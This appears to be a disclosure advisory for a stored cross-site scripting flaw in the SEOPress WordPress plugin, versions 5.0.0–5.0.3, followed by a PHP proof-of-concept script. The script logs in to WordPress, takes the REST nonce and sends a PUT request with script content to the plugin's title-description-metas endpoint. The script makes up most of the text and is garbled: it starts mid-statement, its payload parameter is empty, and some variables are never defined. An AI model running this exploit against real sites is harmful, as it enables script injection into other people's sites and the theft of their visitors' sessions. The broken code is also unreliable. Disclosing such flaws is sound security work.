SEOPress 5.0.0 – 5.0.3 - Authenticated Stored Cross-Site Scripting

The plugin is vulnerable to Stored Cross-Site-Scripting via the processPut function found in the ~/src/Actions/Api/TitleDescriptionMeta.php file which allows authenticated attackers to inject arbitrary web scripts.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Rest API Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest API Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; //Create New Post $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-json/seopress/v1/posts/1/title-description-metas?title=’); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, “PUT”); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt( $ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’, “X-WP-Nonce: $restnonce”, “Content-Length: $length”)); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>